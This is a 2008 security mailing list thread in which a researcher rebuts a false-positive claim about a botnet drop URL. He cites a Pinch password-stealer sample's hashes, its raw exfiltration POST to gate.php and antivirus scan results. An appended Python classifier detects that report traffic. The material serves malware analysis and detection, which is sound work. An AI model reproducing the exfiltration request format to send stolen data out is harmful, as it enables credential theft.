[nsp-sec] 212.43.241.106 in the daily reports
Jose Nazario
jose at arbor.net
Mon Feb 25 07:26:46 EST 2008
On Mon, 25 Feb 2008, David Freedman wrote:
> Your daily reports flagged 212.43.241.106 as a botnet controller with
> the URL http://www.winfleet.fr/fr/gate.php,
> I've been told the following by our systems dept:
> "The ip 212.43.241.106 is the virtual ip of our mutualized hosting. The
> script gate.php sends a mail directly or from a file with information
> of customers' gps location of trucks.
> This script seems to be very normal. "
> Can we get this removed from the reports as a false positive?
from this perspective - outside looking in - i'm pretty sure it's not a
false positive based on the data i have available to me. i have a sample
that POSTs to that very URL, and it's a Pinch POST.
MD5: 9efb1eb0eae22a713c91c7060bb46da3
SHA1: 9b391b3a76a2f4e4e3f250ad4cd4d77e3436fe26
File type: application/x-ms-dos-executable
File size: 53248 bytes
POST /fr/gate.php HTTP/1.0
Host: www.winfleet.fr
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 13414
a=asd at timeparty.org&b=my_report&d=report.bin&c=UDNNTAAAAACiJAAAEQ....
here's the vtotal on it:
[ file data ]
* name: 112226
* size: 53248
* md5.: 9efb1eb0eae22a713c91c7060bb46da3
* sha1: 9b391b3a76a2f4e4e3f250ad4cd4d77e3436fe26
* peid..: -
[ scan result ]
AhnLab-V3 2008.2.22.0/20080222 found [Dropper/Agent.53248.N]
AntiVir 7.6.0.67/20080225 found [TR/PSW.LdPinch.TAW.446]
Authentium 4.93.8/20080224 found nothing
Avast 4.7.1098.0/20080224 found nothing
AVG 7.5.0.516/20080225 found nothing
BitDefender 7.2/20080225 found [Packer.Malware.Crypter.C]
CAT-QuickHeal 9.50/20080222 found nothing
ClamAV 0.92.1/20080225 found [Trojan.Dropper-3953]
DrWeb 4.44.0.09170/20080225 found [Trojan.PWS.LDPinch.2534]
eSafe 7.0.15.0/20080221 found [Suspicious File]
eTrust-Vet 31.3.5562/20080225 found nothing
Ewido 4.0/20080225 found nothing
F-Prot 4.4.2.54/20080224 found [W32/Heuristic-162!Eldorado]
F-Secure 6.70.13260.0/20080225 found nothing
FileAdvisor 1/20080225 found nothing
Fortinet 3.14.0.0/20080225 found nothing
Ikarus T3.1.1.20/20080225 found [Trojan-Downloader.Delf.OAQ]
Kaspersky 7.0.0.125/20080225 found [Trojan-Dropper.Win32.Agent.dqv]
McAfee 5236/20080222 found nothing
Microsoft 1.3204/20080225 found [Trojan:Win32/Meredrop]
NOD32v2 2899/20080225 found [a variant of Win32/TrojanDropper.Delf.NFQ]
Norman 5.80.02/20080225 found [W32/Agent.DZWU]
Panda 9.0.0.4/20080225 found [Suspicious file]
Prevx1 V2/20080225 found nothing
Rising 20.33.02.00/20080225 found nothing
Sophos 4.26.0/20080225 found [Mal/Generic-A]
Sunbelt 3.0.893.0/20080223 found [Trojan-PWS.LDPinch.TAW]
Symantec 10/20080225 found nothing
TheHacker 6.2.9.228/20080223 found nothing
VBA32 3.12.6.1/20080221 found [Trojan-Dropper.Win32.Agent.dqv]
VirusBuster 4.3.26:9/20080224 found nothing
Webwasher-Gateway 6.6.2/20080225 found [Trojan.PSW.LdPinch.TAW.446]
[ notes ]
packers: embedded, RCryptor
i can send you everything i have on it if you need it.
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
security researcher, office of the CTO, arbor networks
v: (734) 821 1427 http://asert.arbornetworks.com/
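As an added example (not code from the original post, from Arbor or from any product named in the scan results), a small Python classifier that scores a captured HTTP request by the Pinch-report traits visible in the POST above: an e-mail address in a=, a report label in b=, a .bin attachment name in d= and a long base64 blob in c=. The c= blob and the benign truck-location upload used as test input are constructed, not taken from the sample.

```python
# Added example: score a raw HTTP request by the LdPinch "gate.php" report traits.
import base64
import re
from urllib.parse import parse_qs
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[a-z]{2,}$", re.I)

def parse_request(raw: bytes):
    # Split a raw HTTP/1.x request into (method, path, headers, body).
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.decode("latin-1")

def looks_like_base64(s: str, min_len: int = 64) -> bool:
    # True for a long value that strictly decodes as base64 (the c= field).
    try:
        return len(s) >= min_len and bool(base64.b64decode(s, validate=True))
    except ValueError:
        return False

def pinch_indicators(raw: bytes) -> list:
    # Return the Pinch-report traits the request matches (empty if none).
    method, path, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "")
    if (method != "POST" or not path.endswith("gate.php")
            or not ctype.startswith("application/x-www-form-urlencoded")):
        return []
    f = {k: v[0] for k, v in parse_qs(body).items()}
    hits = []
    if EMAIL_RE.match(f.get("a", "")):
        hits.append("a=recipient e-mail")
    if f.get("b", "").endswith("report"):
        hits.append("b=report label")
    if f.get("d", "").endswith(".bin"):
        hits.append("d=.bin attachment name")
    if looks_like_base64(f.get("c", "")):
        hits.append("c=base64 payload")
    return hits

def is_pinch_report(raw: bytes, threshold: int = 3) -> bool:
    return len(pinch_indicators(raw)) >= threshold

HDR = (b"POST /fr/gate.php HTTP/1.0\r\nHost: www.winfleet.fr\r\n"
       b"Content-Type: application/x-www-form-urlencoded\r\n\r\n")
# Constructed test inputs: the c= blob is made up; the benign body is what the
# GPS upload described by the hosting provider might look like.
SAMPLE_PINCH = (HDR + b"a=asd%40timeparty.org&b=my_report&d=report.bin&c="
                + base64.b64encode(b"PNCH" + bytes(80)))
SAMPLE_BENIGN = HDR + b"truck=42&lat=48.85&lon=2.35&ts=1203945600"
```

Run over proxy or IDS captures of traffic to the same path, a legitimate GPS upload produces no hits while the sample's field layout produces all four.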